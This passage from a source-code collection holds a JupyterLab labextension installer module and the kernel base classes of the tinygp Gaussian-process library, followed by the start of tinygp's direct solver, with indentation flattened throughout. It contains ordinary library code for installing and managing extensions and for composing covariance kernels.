labextensions_dir : str [optional]
Specify absolute path of labextensions directory explicitly.
sys_prefix : bool [default: False]
Install into the sys.prefix, i.e. environment
"""
labext = _get_labextension_dir(user=user, sys_prefix=sys_prefix, prefix=prefix, labextensions_dir=labextensions_dir)
# make sure labextensions dir exists
if not os.path.exists(labext):
return False
if isinstance(files, string_types):
# one file given, turn it into a list
files = [files]
return all(os.path.exists(pjoin(labext, f)) for f in files)
def install_labextension(path, name, overwrite=False, symlink=False,
user=False, prefix=None, labextensions_dir=None,
logger=None, sys_prefix=False
):
"""Install a Javascript extension for JupyterLab
Stages files and/or directories into the labextensions directory.
By default, this compares modification time, and only stages files that need updating.
If `overwrite` is specified, matching files are purged before proceeding.
Parameters
----------
path : path to file, directory, zip or tarball archive, or URL to install
Archives (zip or tarballs) will be extracted into the labextensions directory.
name : str
name the labextension is installed to. For example, if name is 'foo', then
the source file will be installed to 'labextensions/foo'.
overwrite : bool [default: False]
If True, always install the files, regardless of what may already be installed.
symlink : bool [default: False]
If True, create a symlink in labextensions, rather than copying files.
Not allowed with URLs or archives. Windows support for symlinks requires
Vista or above, Python 3, and a permission bit which only admin users
have by default, so don't rely on it.
user : bool [default: False]
Whether to install to the user's labextensions directory.
Otherwise do a system-wide install (e.g. /usr/local/share/jupyter/labextensions).
prefix : str [optional]
Specify install prefix, if it should differ from default (e.g. /usr/local).
Will install to ``<prefix>/share/jupyter/labextensions``
labextensions_dir : str [optional]
Specify absolute path of labextensions directory explicitly.
logger : Jupyter logger [optional]
Logger instance to use
sys_prefix : bool [default: False]
Install into the sys.prefix, i.e. environment
"""
# the actual path to which we eventually installed
full_dest = None
labext = _get_labextension_dir(user=user, sys_prefix=sys_prefix, prefix=prefix, labextensions_dir=labextensions_dir)
# make sure labextensions dir exists
ensure_dir_exists(labext)
# forcing symlink parameter to False if os.symlink does not exist (e.g., on Windows machines running python 2)
if not hasattr(os, 'symlink'):
symlink = False
if isinstance(path, (list, tuple)):
raise TypeError("path must be a string pointing to a single extension to install; call this function multiple times to install multiple extensions")
path = cast_unicode_py2(path)
if path.startswith(('https://', 'http://')):
raise NotImplementedError('Urls are not yet supported for labextensions')
elif path.endswith('.zip') or _safe_is_tarfile(path):
raise NotImplementedError('Archive files are not yet supported for labextensions')
else:
destination = cast_unicode_py2(name)
full_dest = normpath(pjoin(labext, destination))
if overwrite and os.path.lexists(full_dest):
if logger:
logger.info("Removing: %s" % full_dest)
if os.path.isdir(full_dest) and not os.path.islink(full_dest):
shutil.rmtree(full_dest)
else:
os.remove(full_dest)
if symlink:
path = os.path.abspath(path)
if not os.path.exists(full_dest):
if logger:
logger.info("Symlinking: %s -> %s" % (full_dest, path))
os.symlink(path, full_dest)
elif os.path.isdir(path):
path = pjoin(os.path.abspath(path), '') # end in path separator
for parent, dirs, files in os.walk(path):
dest_dir = pjoin(full_dest, parent[len(path):])
if not os.path.exists(dest_dir):
if logger:
logger.info("Making directory: %s" % dest_dir)
os.makedirs(dest_dir)
for file in files:
src = pjoin(parent, file)
dest_file = pjoin(dest_dir, file)
_maybe_copy(src, dest_file, logger=logger)
else:
src = path
_maybe_copy(src, full_dest, logger=logger)
return full_dest
def install_labextension_python(module, overwrite=False, symlink=False,
user=False, sys_prefix=False, prefix=None, labextensions_dir=None, logger=None):
"""Install a labextension bundled in a Python package.
Returns a list of installed/updated directories.
See install_labextension for parameter information."""
m, labexts = _get_labextension_metadata(module)
base_path = os.path.split(m.__file__)[0]
full_dests = []
for labext in labexts:
src = os.path.join(base_path, labext['src'])
name = labext['name']
if logger:
logger.info("Installing %s -> %s" % (src, name))
full_dest = install_labextension(
src, name=name, overwrite=overwrite, symlink=symlink,
user=user, sys_prefix=sys_prefix, prefix=prefix, labextensions_dir=labextensions_dir,
logger=logger
)
validate_labextension_folder(name, full_dest, logger)
full_dests.append(full_dest)
return full_dests
def uninstall_labextension(name, user=False, sys_prefix=False, prefix=None,
labextensions_dir=None, logger=None):
"""Uninstall a Javascript extension of JupyterLab
Removes staged files and/or directories in the labextensions directory and
removes the extension from the frontend config.
Parameters
----------
name: str
The name of the labextension.
user : bool [default: False]
Whether to uninstall from the user's labextensions directory.
Otherwise do a system-wide uninstall (e.g. /usr/local/share/jupyter/labextensions).
sys_prefix : bool [default: False]
Uninstall from the sys.prefix, i.e. environment
prefix : str [optional]
Specify prefix, if it should differ from default (e.g. /usr/local).
Will uninstall from ``<prefix>/share/jupyter/labextensions``
labextensions_dir : str [optional]
Specify absolute path of labextensions directory explicitly.
logger : Jupyter logger [optional]
Logger instance to use
"""
labext = _get_labextension_dir(user=user, sys_prefix=sys_prefix, prefix=prefix, labextensions_dir=labextensions_dir)
dest = cast_unicode_py2(name)
full_dest = pjoin(labext, dest)
if os.path.lexists(full_dest):
if logger:
logger.info("Removing: %s" % full_dest)
if os.path.isdir(full_dest) and not os.path.islink(full_dest):
shutil.rmtree(full_dest)
else:
os.remove(full_dest)
disable_labextension(name, user=user, sys_prefix=sys_prefix,
logger=logger)
def uninstall_labextension_python(module,
user=False, sys_prefix=False, prefix=None, labextensions_dir=None,
logger=None):
"""Uninstall a labextension bundled in a Python package.
See parameters of `install_labextension_python`
"""
m, labexts = _get_labextension_metadata(module)
for labext in labexts:
name = labext['name']
if logger:
logger.info("Uninstalling {}".format(name))
uninstall_labextension(name, user=user, sys_prefix=sys_prefix,
prefix=prefix, labextensions_dir=labextensions_dir, logger=logger)
def _set_labextension_state(name, state,
user=True, sys_prefix=False, logger=None):
"""Set whether the JupyterLab frontend should use the named labextension
Returns True if the final state is the one requested.
Parameters
name : string
The name of the extension.
state : bool
The state in which to leave the extension
user : bool [default: True]
Whether to update the user's .jupyter/labextensions directory
sys_prefix : bool [default: False]
Whether to update the sys.prefix, i.e. environment. Will override
`user`.
logger : Jupyter logger [optional]
Logger instance to use
"""
user = False if sys_prefix else user
config_dir = os.path.join(
_get_config_dir(user=user, sys_prefix=sys_prefix), 'labconfig')
cm = BaseJSONConfigManager(config_dir=config_dir)
if logger:
logger.info("{} extension {}...".format(
"Enabling" if state else "Disabling",
name
))
cfg = cm.get("jupyterlab_config")
labextensions = (
cfg.setdefault("LabApp", {})
.setdefault("labextensions", {})
)
old_enabled = labextensions.get(name, None)
new_enabled = state if state is not None else not old_enabled
if logger:
if new_enabled:
logger.info(u"Enabling: %s" % (name))
else:
logger.info(u"Disabling: %s" % (name))
labextensions[name] = new_enabled
if logger:
logger.info(u"- Writing config: {}".format(config_dir))
cm.update("jupyterlab_config", cfg)
if new_enabled:
validate_labextension(name, logger=logger)
return old_enabled == state
def _set_labextension_state_python(state, module, user, sys_prefix,
logger=None):
"""Enable or disable some labextensions stored in a Python package
Returns a list of whether the state was achieved (i.e. changed, or was
already right)
Parameters
----------
state : Bool
Whether the extensions should be enabled
module : str
Importable Python module exposing the
magic-named `_jupyter_labextension_paths` function
user : bool
Whether to enable in the user's labextensions directory.
sys_prefix : bool
Enable/disable in the sys.prefix, i.e. environment
logger : Jupyter logger [optional]
Logger instance to use
"""
m, labexts = _get_labextension_metadata(module)
return [_set_labextension_state(name=labext["name"],
state=state,
user=user, sys_prefix=sys_prefix,
logger=logger)
for labext in labexts]
def enable_labextension(name, user=True, sys_prefix=False,
logger=None):
"""Enable a named labextension
Returns True if the final state is the one requested.
Parameters
----------
name : string
The name of the extension.
user : bool [default: True]
Whether to enable in the user's labextensions directory.
sys_prefix : bool [default: False]
Whether to enable in the sys.prefix, i.e. environment. Will override
`user`
logger : Jupyter logger [optional]
Logger instance to use
"""
return _set_labextension_state(name=name,
state=True,
user=user, sys_prefix=sys_prefix,
logger=logger)
def disable_labextension(name, user=True, sys_prefix=False,
logger=None):
"""Disable a named labextension
Returns True if the final state is the one requested.
Parameters
----------
name : string
The name of the extension.
user : bool [default: True]
Whether to enable in the user's labextensions directory.
sys_prefix : bool [default: False]
Whether to enable in the sys.prefix, i.e. environment. Will override
`user`.
logger : Jupyter logger [optional]
Logger instance to use
"""
return _set_labextension_state(name=name,
state=False,
user=user, sys_prefix=sys_prefix,
logger=logger)
def enable_labextension_python(module, user=True, sys_prefix=False,
logger=None):
"""Enable some labextensions associated with a Python module.
Returns a list of whether the state was achieved (i.e. changed, or was
already right)
Parameters
----------
module : str
Importable Python module exposing the
magic-named `_jupyter_labextension_paths` function
user : bool [default: True]
Whether to enable in the user's labextensions directory.
sys_prefix : bool [default: False]
Whether to enable in the sys.prefix, i.e. environment. Will override
`user`
logger : Jupyter logger [optional]
Logger instance to use
"""
return _set_labextension_state_python(True, module, user, sys_prefix,
logger=logger)
def disable_labextension_python(module, user=True, sys_prefix=False,
logger=None):
"""Disable some labextensions associated with a Python module.
Returns True if the final state is the one requested.
Parameters
----------
module : str
Importable Python module exposing the
magic-named `_jupyter_labextension_paths` function
user : bool [default: True]
Whether to enable in the user's labextensions directory.
sys_prefix : bool [default: False]
Whether to enable in the sys.prefix, i.e. environment
logger : Jupyter logger [optional]
Logger instance to use
"""
return _set_labextension_state_python(False, module, user, sys_prefix,
logger=logger)
def validate_labextension(name, logger=None):
"""Validate a named labextension.
Looks across all of the labextension directories.
Returns a list of warnings.
Parameters
----------
name : str
The name of the extension.
logger : Jupyter logger [optional]
Logger instance to use
"""
for exts in _labextension_dirs():
full_dest = os.path.join(exts, name)
if os.path.exists(full_dest):
return validate_labextension_folder(name, full_dest, logger)
def validate_labextension_folder(name, full_dest, logger=None):
"""Assess the health of an installed labextension
Returns a list of warnings.
Parameters
----------
full_dest : str
The on-disk location of the installed labextension: this should end
with `labextensions/<name>`
logger : Jupyter logger [optional]
Logger instance to use
"""
if logger:
logger.info(" - Validating...")
infos = []
warnings = []
hasFiles = True
hasEntry = False
data = get_labextension_manifest_data_by_folder(full_dest)
for manifest in data.values():
if ('entry' in manifest and 'modules' in manifest):
if (manifest['entry'] in manifest['modules']):
hasEntry = True
files = manifest.get('files', [])
if not files:
hasFiles = False
for fname in files:
path = os.path.join(full_dest, fname)
if not os.path.exists(path):
hasFiles = False
entry_msg = u" {} has {} entry point?"
name = os.path.basename(full_dest)
if hasEntry:
(entry_msg.format(GREEN_OK, name))
else:
warnings.append(entry_msg.format(RED_X, name))
files_msg = u" {} has necessary files?"
if hasFiles:
infos.append(files_msg.format(GREEN_OK, name))
else:
warnings.append(files_msg.format(RED_X, name))
post_mortem = u" {} {} {}"
if logger:
if warnings:
[logger.info(info) for info in infos]
[logger.warn(warning) for warning in warnings]
else:
logger.info(post_mortem.format(name, "", GREEN_OK))
return warnings
#----------------------------------------------------------------------
# Applications
#----------------------------------------------------------------------
from traitlets import Bool, Unicode
from jupyter_core.application import JupyterApp
_base_flags = {}
_base_flags.update(JupyterApp.flags)
_base_flags.pop("y", None)
_base_flags.pop("generate-config", None)
_base_flags.update({
"user" : ({
"BaseLabExtensionApp" : {
"user" : True,
}}, "Apply the operation only for the given user"
),
"system" : ({
"BaseLabExtensionApp" : {
"user" : False,
"sys_prefix": False,
}}, "Apply the operation system-wide"
),
"sys-prefix" : ({
"BaseLabExtensionApp" : {
"sys_prefix" : True,
}}, "Use sys.prefix as the prefix for installing labextensions (for environments, packaging)"
),
"py" : ({
"BaseLabExtensionApp" : {
"python" : True,
}}, "Install from a Python package"
)
})
_base_flags['python'] = _base_flags['py']
class BaseLabExtensionApp(JupyterApp):
"""Base labextension installer app"""
_log_formatter_cls = LogFormatter
flags = _base_flags
version = __version__
user = Bool(False, config=True, help="Whether to do a user install")
sys_prefix = Bool(False, config=True, help="Use the sys.prefix as the prefix")
python = Bool(False, config=True, help="Install from a Python package")
def _log_format_default(self):
"""A default format for messages"""
return "%(message)s"
flags = {}
flags.update(_base_flags)
flags.update({
"overwrite" : ({
"InstallLabExtensionApp" : {
"overwrite" : True,
}}, "Force overwrite of existing files"
),
"symlink" : ({
"InstallLabExtensionApp" : {
"symlink" : True,
}}, "Create symlink instead of copying files"
),
})
flags['s'] = flags['symlink']
aliases = {
"prefix" : "InstallLabExtensionApp.prefix",
"labextensions" : "InstallLabExtensionApp.labextensions_dir",
}
class InstallLabExtensionApp(BaseLabExtensionApp):
"""Entry point for installing JupyterLab extensions"""
description = """Install JupyterLab extensions
Usage
jupyter labextension install /path/to/myextension myextension [--user|--sys-prefix]
jupyter labextension install --py myextensionPyPackage [--user|--sys-prefix]
This copies a file or a folder into the Jupyter labextensions directory.
If a URL is given, it will be downloaded.
If an archive is given, it will be extracted into labextensions.
If the requested files are already up to date, no action is taken
unless --overwrite is specified.
"""
examples = """
jupyter labextension install /path/to/myextension myextension
jupyter labextension install --py myextensionPyPackage
"""
aliases = aliases
flags = flags
overwrite = Bool(False, config=True, help="Force overwrite of existing files")
symlink = Bool(False, config=True, help="Create symlinks instead of copying files")
prefix = Unicode('', config=True, help="Installation prefix")
labextensions_dir = Unicode('', config=True,
help="Full path to labextensions dir (probably use prefix or user)")
def _config_file_name_default(self):
"""The default config file name."""
return 'jupyterlab_config'
def install_extensions(self):
"""Perform the installation of labextension(s)"""
if self.python:
if len(self.extra_args) > 1:
raise ValueError("Only one labextension allowed at a time. "
"Call multiple times to install multiple extensions.")
install = install_labextension_python
kwargs = {}
else:
if len(self.extra_args) > 2:
raise ValueError("Only one labextension allowed at a time. "
"Call multiple times to install multiple extensions.")
install = install_labextension
kwargs = {'name': self.extra_args[1]}
full_dests = install(self.extra_args[0],
overwrite=self.overwrite,
symlink=self.symlink,
user=self.user,
sys_prefix=self.sys_prefix,
prefix=self.prefix,
labextensions_dir=self.labextensions_dir,
logger=self.log,
**kwargs
)
if full_dests:
self.log.info(
u"\nTo enable this labextension in the browser every time"
" JupyterLab loads:\n\n"
" jupyter labextension enable {}{}{}{}\n".format(
self.extra_args[0] if self.python else self.extra_args[1],
" --user" if self.user else "",
" --py" if self.python else "",
" --sys-prefix" if self.sys_prefix else ""
)
)
def start(self):
"""Perform the App's function as configured"""
if not self.extra_args:
sys.exit('Please specify a labextension to install')
else:
try:
self.install_extensions()
except ArgumentConflict as e:
sys.exit(str(e))
class UninstallLabExtensionApp(BaseLabExtensionApp):
"""Entry point for uninstalling JupyterLab extensions"""
version = __version__
description = """Uninstall Jupyterlab extensions
Usage
jupyter labextension uninstall myextension
jupyter labextension uninstall --py myextensionPyPackage
This uninstalls a labextension.
"""
examples = """
jupyter labextension uninstall myextension
jupyter labextension uninstall --py myextensionPyPackage
"""
aliases = {
"prefix" : "UninstallLabExtensionApp.prefix",
"labextensions" : "UninstallLabExtensionApp.labextensions_dir",
"name": "UninstallLabExtensionApp.name",
}
prefix = Unicode('', config=True, help="Installation prefix")
labextensions_dir = Unicode('', config=True, help="Full path to labextensions dir (probably use prefix or user)")
name = Unicode('', config=True, help="The name of the extension.")
def _config_file_name_default(self):
"""The default config file name."""
return 'jupyterlab_config'
def uninstall_extensions(self):
"""Uninstall some labextensions"""
kwargs = {
'user': self.user,
'sys_prefix': self.sys_prefix,
'prefix': self.prefix,
'labextensions_dir': self.labextensions_dir,
'logger': self.log
}
arg_count = 1
if len(self.extra_args) > arg_count:
raise ValueError("only one labextension allowed at a time. Call multiple times to uninstall multiple extensions.")
if len(self.extra_args) < arg_count:
raise ValueError("not enough arguments")
if self.python:
uninstall_labextension_python(self.extra_args[0], **kwargs)
else:
uninstall_labextension(self.extra_args[0], **kwargs)
def start(self):
if not self.extra_args:
sys.exit('Please specify a labextension to uninstall')
else:
try:
self.uninstall_extensions()
except ArgumentConflict as e:
sys.exit(str(e))
class ToggleLabExtensionApp(BaseLabExtensionApp):
"""A base class for apps that enable/disable extensions"""
name = "jupyter labextension enable/disable"
version = __version__
description = "Enable/disable a labextension in configuration."
user = Bool(True, config=True, help="Apply the configuration only for the current user (default)")
_toggle_value = None
def _config_file_name_default(self):
"""The default config file name."""
return 'jupyterlab_config'
def toggle_labextension_python(self, module):
"""Toggle some extensions in an importable Python module.
Returns a list of booleans indicating whether the state was changed as
requested.
Parameters
----------
module : str
Importable Python module exposing the
magic-named `_jupyter_labextension_paths` function
"""
toggle = (enable_labextension_python if self._toggle_value
else disable_labextension_python)
return toggle(module,
user=self.user,
sys_prefix=self.sys_prefix,
logger=self.log)
def toggle_labextension(self, name):
"""Toggle some a named labextension by require-able AMD module.
Returns whether the state was changed as requested.
Parameters
----------
require : str
require.js path used to load the labextension
"""
toggle = (enable_labextension if self._toggle_value
else disable_labextension)
return toggle(name,
user=self.user, sys_prefix=self.sys_prefix,
logger=self.log)
def start(self):
if not self.extra_args:
sys.exit('Please specify a labextension/package to enable or disable')
elif len(self.extra_args) > 1:
sys.exit('Please specify one labextension/package at a time')
if self.python:
self.toggle_labextension_python(self.extra_args[0])
else:
self.toggle_labextension(self.extra_args[0])
class EnableLabExtensionApp(ToggleLabExtensionApp):
"""An App that enables labextensions"""
name = "jupyter labextension enable"
description = """
Enable a labextension in frontend configuration.
Usage
jupyter labextension enable myextension [--system|--sys-prefix]
"""
_toggle_value = True
class DisableLabExtensionApp(ToggleLabExtensionApp):
"""An App that disables labextensions"""
name = "jupyter labextension disable"
description = """
Enable a labextension in frontend configuration.
Usage
jupyter labextension disable myextension [--system|--sys-prefix]
"""
_toggle_value = None
class ListLabExtensionsApp(BaseLabExtensionApp):
"""An App that lists and validates labextensions"""
name = "jupyter labextension list"
version = __version__
description = "List all labextensions known by the configuration system"
def list_labextensions(self):
"""List all the labextensions"""
config_dirs = [os.path.join(p, 'labconfig') for p in jupyter_config_path()]
print("Known labextensions:")
for config_dir in config_dirs:
cm = BaseJSONConfigManager(parent=self, config_dir=config_dir)
data = cm.get("jupyterlab_config")
labextensions = (
data.setdefault("LabApp", {})
.setdefault("labextensions", {})
)
if labextensions:
print(u'config dir: {}'.format(config_dir))
for name, enabled in labextensions.items():
print(u' {} {}'.format(
name,
GREEN_ENABLED if enabled else RED_DISABLED))
validate_labextension(name, self.log)
def start(self):
"""Perform the App's functions as configured"""
self.list_labextensions()
_examples = """
jupyter labextension list # list all configured labextensions
jupyter labextension install --py <packagename> # install a labextension from a Python package
jupyter labextension enable --py <packagename> # enable all labextensions in a Python package
jupyter labextension disable --py <packagename> # disable all labextensions in a Python package
jupyter labextension uninstall --py <packagename> # uninstall a labextension in a Python package
"""
class LabExtensionApp(BaseLabExtensionApp):
"""Base jupyter labextension command entry point"""
name = "jupyter labextension"
version = __version__
description = "Work with JupyterLab extensions"
examples = _examples
subcommands = dict(
install=(InstallLabExtensionApp, "Install a labextension"),
enable=(EnableLabExtensionApp, "Enable a labextension"),
disable=(DisableLabExtensionApp, "Disable a labextension"),
uninstall=(UninstallLabExtensionApp, "Uninstall a labextension"),
list=(ListLabExtensionsApp, "List labextensions")
)
def start(self):
"""Perform the App's functions as configured"""
super(LabExtensionApp, self).start()
# The above should have called a subcommand and raised NoStart; if we
# get here, it didn't, so we should self.log.info a message.
subcmds = ", ".join(sorted(self.subcommands))
sys.exit("Please supply at least one subcommand: %s" % subcmds)
main = LabExtensionApp.launch_instance
#------------------------------------------------------------------------------
# Private API
#------------------------------------------------------------------------------
def _should_copy(src, dest, logger=None):
"""Should a file be copied, if it doesn't exist, or is newer?
Returns whether the file needs to be updated.
Parameters
----------
src : string
A path that should exist from which to copy a file
src : string
A path that might exist to which to copy a file
logger : Jupyter logger [optional]
Logger instance to use
"""
if not os.path.exists(dest):
return True
if os.stat(src).st_mtime - os.stat(dest).st_mtime > 1e-6:
# we add a fudge factor to work around a bug in python 2.x
# that was fixed in python 3.x: http://bugs.python.org/issue12904
if logger:
logger.warn("Out of date: %s" % dest)
return True
if logger:
logger.info("Up to date: %s" % dest)
return False
def _maybe_copy(src, dest, logger=None):
"""Copy a file if it needs updating.
Parameters
----------
src : string
A path that should exist from which to copy a file
src : string
A path that might exist to which to copy a file
logger : Jupyter logger [optional]
Logger instance to use
"""
if _should_copy(src, dest, logger=logger):
if logger:
logger.info("Copying: %s -> %s" % (src, dest))
shutil.copy2(src, dest)
def _safe_is_tarfile(path):
"""Safe version of is_tarfile, return False on IOError.
Returns whether the file exists and is a tarfile.
Parameters
----------
path : string
A path that might not exist and or be a tarfile
"""
try:
return tarfile.is_tarfile(path)
except IOError:
return False
def _get_labextension_dir(user=False, sys_prefix=False, prefix=None, labextensions_dir=None):
"""Return the labextension directory specified
Parameters
----------
user : bool [default: False]
Get the user's .jupyter/labextensions directory
sys_prefix : bool [default: False]
Get sys.prefix, i.e. ~/.envs/my-env/share/jupyter/labextensions
prefix : str [optional]
Get custom prefix
labextensions_dir : str [optional]
Get what you put in
"""
if sum(map(bool, [user, prefix, labextensions_dir, sys_prefix])) > 1:
raise ArgumentConflict("cannot specify more than one of user, sys_prefix, prefix, or labextensions_dir")
if user:
labext = pjoin(jupyter_data_dir(), u'labextensions')
elif sys_prefix:
labext = pjoin(ENV_JUPYTER_PATH[0], u'labextensions')
elif prefix:
labext = pjoin(prefix, 'share', 'jupyter', 'labextensions')
elif labextensions_dir:
labext = labextensions_dir
else:
labext = pjoin(SYSTEM_JUPYTER_PATH[0], 'labextensions')
return labext
def _labextension_dirs():
"""The possible locations of labextensions.
Returns a list of known base extension locations
"""
return [
pjoin(jupyter_data_dir(), u'labextensions'),
pjoin(ENV_JUPYTER_PATH[0], u'labextensions'),
pjoin(SYSTEM_JUPYTER_PATH[0], 'labextensions')
]
def _get_config_dir(user=False, sys_prefix=False):
"""Get the location of config files for the current context
Returns the string to the enviornment
Parameters
----------
user : bool [default: False]
Get the user's .jupyter config directory
sys_prefix : bool [default: False]
Get sys.prefix, i.e. ~/.envs/my-env/etc/jupyter
"""
user = False if sys_prefix else user
if user and sys_prefix:
raise ArgumentConflict("Cannot specify more than one of user or sys_prefix")
if user:
labext = jupyter_config_dir()
elif sys_prefix:
labext = ENV_CONFIG_PATH[0]
else:
labext = SYSTEM_CONFIG_PATH[0]
return labext
def _get_labextension_metadata(module):
"""Get the list of labextension paths associated with a Python module.
Returns a tuple of (the module, [{
'name': 'mockextension',
'src': 'static',
}])
Parameters
----------
module : str
Importable Python module exposing the
magic-named `_jupyter_labextension_paths` function
"""
m = import_item(module)
if not hasattr(m, '_jupyter_labextension_paths'):
raise KeyError('The Python module {} is not a valid labextension'.format(module))
labexts = m._jupyter_labextension_paths()
return m, labexts
def _read_config_data(user=False, sys_prefix=False):
"""Get the config for the current context
Returns the string to the enviornment
Parameters
----------
user : bool [default: False]
Get the user's .jupyter config directory
sys_prefix : bool [default: False]
Get sys.prefix, i.e. ~/.envs/my-env/etc/jupyter
"""
config_dir = _get_config_dir(user=user, sys_prefix=sys_prefix)
config_man = BaseJSONConfigManager(config_dir=config_dir)
return config_man.get('jupyterlab_config')
def _write_config_data(data, user=False, sys_prefix=False):
"""Update the config for the current context
Parameters
----------
data : object
An object which can be accepted by ConfigManager.update
user : bool [default: False]
Get the user's .jupyter config directory
sys_prefix : bool [default: False]
Get sys.prefix, i.e. ~/.envs/my-env/etc/jupyter
"""
config_dir = _get_config_dir(user=user, sys_prefix=sys_prefix)
config_man = BaseJSONConfigManager(config_dir=config_dir)
config_man.update('jupyterlab_config', data)
if __name__ == '__main__':
main()
``` |
{
"source": "0x0L/tinygp",
"score": 3
} |
#### File: tinygp/kernels/base.py
```python
from __future__ import annotations
__all__ = [
"Kernel",
"Conditioned",
"Custom",
"Sum",
"Product",
"Constant",
"DotProduct",
"Polynomial",
]
from abc import ABCMeta, abstractmethod
from typing import TYPE_CHECKING, Any, Callable, Optional, Sequence, Union
import jax
import jax.numpy as jnp
from tinygp.helpers import JAXArray, dataclass
if TYPE_CHECKING:
from tinygp.solvers.solver import Solver
Axis = Union[int, Sequence[int]]
class Kernel(metaclass=ABCMeta):
"""The base class for all kernel implementations
This subclass provides default implementations to add and multiply kernels.
Subclasses should accept parameters in their ``__init__`` and then override
:func:`Kernel.evaluate` with custom behavior.
"""
if TYPE_CHECKING:
def __init__(self, *args: Any, **kwargs: Any) -> None:
pass
@abstractmethod
def evaluate(self, X1: JAXArray, X2: JAXArray) -> JAXArray:
"""Evaluate the kernel at a pair of input coordinates
This should be overridden be subclasses to return the kernel-specific
value. Two things to note:
1. Users shouldn't generally call :func:`Kernel.evaluate`. Instead,
always "call" the kernel instance directly; for example, you can
evaluate the Matern-3/2 kernel using ``Matern32(1.5)(x1, x2)``, for
arrays of input coordinates ``x1`` and ``x2``.
2. When implementing a custom kernel, this method should treat ``X1``
and ``X2`` as single datapoints. In other words, these inputs will
typically either be scalars of have shape ``n_dim``, where ``n_dim``
is the number of input dimensions, rather than ``n_data`` or
``(n_data, n_dim)``, and you should let the :class:`Kernel` ``vmap``
magic handle all the broadcasting for you.
"""
raise NotImplementedError
def evaluate_diag(self, X: JAXArray) -> JAXArray:
"""Evaluate the kernel on its diagonal
The default implementation simply calls :func:`Kernel.evaluate` with
``X`` as both arguments, but subclasses can use this to make diagonal
calcuations more efficient.
"""
return self.evaluate(X, X)
def matmul(
self,
X1: JAXArray,
X2: Optional[JAXArray] = None,
y: Optional[JAXArray] = None,
) -> JAXArray:
if y is None:
assert X2 is not None
y = X2
X2 = None
if X2 is None:
X2 = X1
return jnp.dot(self(X1, X2), y)
def __call__(
self, X1: JAXArray, X2: Optional[JAXArray] = None
) -> JAXArray:
if X2 is None:
k = jax.vmap(self.evaluate_diag, in_axes=0)(X1)
if k.ndim != 1:
raise ValueError(
"Invalid kernel diagonal shape: "
f"expected ndim = 1, got ndim={k.ndim} "
"check the dimensions of parameters and custom kernels"
)
return k
k = jax.vmap(
jax.vmap(self.evaluate, in_axes=(None, 0)), in_axes=(0, None)
)(X1, X2)
if k.ndim != 2:
raise ValueError(
"Invalid kernel shape: "
f"expected ndim = 2, got ndim={k.ndim} "
"check the dimensions of parameters and custom kernels"
)
return k
def __add__(self, other: Union["Kernel", JAXArray]) -> "Kernel":
if isinstance(other, Kernel):
return Sum(self, other)
return Sum(self, Constant(other))
def __radd__(self, other: Union["Kernel", JAXArray]) -> "Kernel":
if isinstance(other, Kernel):
return Sum(other, self)
return Sum(Constant(other), self)
def __mul__(self, other: Union["Kernel", JAXArray]) -> "Kernel":
if isinstance(other, Kernel):
return Product(self, other)
return Product(self, Constant(other))
def __rmul__(self, other: Union["Kernel", JAXArray]) -> "Kernel":
if isinstance(other, Kernel):
return Product(other, self)
return Product(Constant(other), self)
@dataclass
class Conditioned(Kernel):
"""A kernel used when conditioning a process on data
Args:
X: The coordinates of the data.
scale_tril: The lower Cholesky factor of the base process' kernel
matrix.
kernel: The predictive kerenl; this will generally be the kernel from
the kernel used by the original process.
"""
X: JAXArray
solver: Solver
kernel: Kernel
def evaluate(self, X1: JAXArray, X2: JAXArray) -> JAXArray:
kernel_vec = jax.vmap(self.kernel.evaluate, in_axes=(0, None))
K1 = self.solver.solve_triangular(kernel_vec(self.X, X1))
K2 = self.solver.solve_triangular(kernel_vec(self.X, X2))
return self.kernel.evaluate(X1, X2) - K1.transpose() @ K2
def evaluate_diag(self, X: JAXArray) -> JAXArray:
kernel_vec = jax.vmap(self.kernel.evaluate, in_axes=(0, None))
K = self.solver.solve_triangular(kernel_vec(self.X, X))
return self.kernel.evaluate_diag(X) - K.transpose() @ K
@dataclass
class Custom(Kernel):
"""A custom kernel class implemented as a callable
Args:
function: A callable with a signature and behavior that matches
:func:`Kernel.evaluate`.
"""
function: Callable[[Any, Any], Any]
def evaluate(self, X1: JAXArray, X2: JAXArray) -> JAXArray:
return self.function(X1, X2) # type: ignore
@dataclass
class Sum(Kernel):
"""A helper to represent the sum of two kernels"""
kernel1: Kernel
kernel2: Kernel
def evaluate(self, X1: JAXArray, X2: JAXArray) -> JAXArray:
return self.kernel1.evaluate(X1, X2) + self.kernel2.evaluate(X1, X2)
@dataclass
class Product(Kernel):
"""A helper to represent the product of two kernels"""
kernel1: Kernel
kernel2: Kernel
def evaluate(self, X1: JAXArray, X2: JAXArray) -> JAXArray:
return self.kernel1.evaluate(X1, X2) * self.kernel2.evaluate(X1, X2)
@dataclass
class Constant(Kernel):
r"""This kernel returns the constant
.. math::
k(\mathbf{x}_i,\,\mathbf{x}_j) = c
where :math:`c` is a parameter.
Args:
c: The parameter :math:`c` in the above equation.
"""
value: JAXArray
def __post_init__(self) -> None:
if jnp.ndim(self.value) != 0:
raise ValueError("The value of a constant kernel must be a scalar")
def evaluate(self, X1: JAXArray, X2: JAXArray) -> JAXArray:
return self.value
@dataclass
class DotProduct(Kernel):
r"""The dot product kernel
.. math::
k(\mathbf{x}_i,\,\mathbf{x}_j) = \mathbf{x}_i \cdot \mathbf{x}_j
with no parameters.
"""
def evaluate(self, X1: JAXArray, X2: JAXArray) -> JAXArray:
return X1 @ X2
@dataclass
class Polynomial(Kernel):
r"""A polynomial kernel
.. math::
k(\mathbf{x}_i,\,\mathbf{x}_j) = [(\mathbf{x}_i / \ell) \cdot
(\mathbf{x}_j / \ell) + \sigma^2]^P
Args:
order: The power :math:`P`.
scale: The parameter :math:`\ell`.
sigma: The parameter :math:`\sigma`.
"""
order: JAXArray
scale: JAXArray = jnp.ones(())
sigma: JAXArray = jnp.zeros(())
def evaluate(self, X1: JAXArray, X2: JAXArray) -> JAXArray:
return (
(X1 / self.scale) @ (X2 / self.scale) + jnp.square(self.sigma)
) ** self.order
```
#### File: tinygp/solvers/direct.py
```python
from __future__ import annotations
__all__ = ["DirectSolver"]
from typing import Any, Optional
import jax.numpy as jnp
import numpy as np
from jax.scipy import linalg
from tinygp import kernels
from tinygp.helpers import JAXArray, dataclass
from tinygp.solvers.solver import Solver
@dataclass
class DirectSolver(Solver):
X: JAXArray
variance_value: JAXArray
covariance_value: JAXArray
scale_tril: JAXArray
@classmethod
def init(
cls,
kernel: kernels.Kernel,
X: JAXArray,
diag: JAXArray,
*,
covariance: Optional[Any] = None,
) -> "DirectSolver":
variance = kernel(X) + diag
if covariance is None:
